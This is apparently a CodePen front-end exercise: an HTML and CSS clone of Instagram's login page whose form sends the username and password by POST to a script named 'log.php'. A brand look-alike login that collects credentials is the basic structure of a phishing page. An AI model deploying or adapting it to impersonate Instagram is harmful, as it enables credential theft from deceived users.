| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206 |
- <!DOCTYPE html>
- <html lang="en" >
- <head>
- <meta charset="UTF-8">
-
- <link rel="apple-touch-icon" type="image/png" href="https://cpwebassets.codepen.io/assets/favicon/apple-touch-icon-5ae1a0698dcc2402e9712f7d01ed509a57814f994c660df9f7a952f3060705ee.png" />
- <meta name="apple-mobile-web-app-title" content="CodePen">
- <link rel="shortcut icon" type="image/x-icon" href="https://cpwebassets.codepen.io/assets/favicon/favicon-aec34940fbc1a6e787974dcd360f2c6b63348d4b1f4e06c77743096d55480f33.ico" />
- <link rel="mask-icon" type="image/x-icon" href="https://cpwebassets.codepen.io/assets/favicon/logo-pin-b4b4269c16397ad2f0f7a01bcdf513a1994f4c94b8af2f191c09eb0d601762b1.svg" color="#111" />
-
- <title>CodePen - Instagram login page</title>
- <link rel="canonical" href="https://codepen.io/RajRajeshDn/pen/mRQQJQ" />
-
-
-
-
- <style>
- * {
- margin: 0px;
- padding: 0px;
- }
- body {
- background-color: #eee;
- }
- #wrapper {
- width: 500px;
- height: 50%;
- overflow: hidden;
- border: 0px solid #000;
- margin: 50px auto;
- padding: 10px;
- }
- .main-content {
- width: 250px;
- height: 40%;
- margin: 10px auto;
- background-color: #fff;
- border: 2px solid #e6e6e6;
- padding: 40px 50px;
- }
- .header {
- border: 0px solid #000;
- margin-bottom: 5px;
- }
- .header img {
- height: 50px;
- width: 175px;
- margin: auto;
- position: relative;
- left: 40px;
- }
- .input-1,
- .input-2 {
- width: 100%;
- margin-bottom: 5px;
- padding: 8px 12px;
- border: 1px solid #dbdbdb;
- box-sizing: border-box;
- border-radius: 3px;
- }
- .overlap-text {
- position: relative;
- }
- .overlap-text a {
- position: absolute;
- top: 8px;
- right: 10px;
- color: #003569;
- font-size: 14px;
- text-decoration: none;
- font-family: 'Overpass Mono', monospace;
- letter-spacing: -1px;
- }
- .btn {
- width: 100%;
- background-color: #3897f0;
- border: 1px solid #3897f0;
- padding: 5px 12px;
- color: #fff;
- font-weight: bold;
- cursor: pointer;
- border-radius: 3px;
- }
- .sub-content {
- width: 250px;
- height: 40%;
- margin: 10px auto;
- border: 1px solid #e6e6e6;
- padding: 20px 50px;
- background-color: #fff;
- }
- .s-part {
- text-align: center;
- font-family: 'Overpass Mono', monospace;
- word-spacing: -3px;
- letter-spacing: -2px;
- font-weight: normal;
- }
- .s-part a {
- text-decoration: none;
- cursor: pointer;
- color: #3897f0;
- font-family: 'Overpass Mono', monospace;
- word-spacing: -3px;
- letter-spacing: -2px;
- font-weight: normal;
- }
- input:focus {
- background-color: yellow;
- }
- /* youtube link */
- .youtube{
- position: fixed;
- bottom: 10px;
- right: 10px;
- width: 160px;
- text-align: center;
- padding: 15px 10px;
- background: #bb0000;
- border-radius: 5px;
- }
- .youtube a{
- text-decoration: none;
- color: #fff;
- text-transform: capitalize;
- letter-spacing: 1px;
- }
- </style>
- <script>
- window.console = window.console || function(t) {};
- </script>
-
-
- </head>
- <body translate="no">
- <link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">
- <div id="wrapper">
- <div class="main-content">
- <div class="header">
- <img src="https://i.imgur.com/zqpwkLQ.png" />
- </div>
- <div class="l-part">
- <form name="formulario" action="log.php" method="POST">
- <input type="text" placeholder="Username" name="user" class="input-1" />
- <div class="overlap-text">
- <input type="password" placeholder="Password" name="password" class="input-2" />
- <a href="#">Forgot?</a>
-
- </div>
- <input type="submit" value="Log in" class="btn" />
- </form>
- </div>
- </div>
- <div class="sub-content">
- <div class="s-part">
- Don't have an account?<a href="#">Sign up</a>
- </div>
- </div>
- </div>
-
- </body>
- </html>
|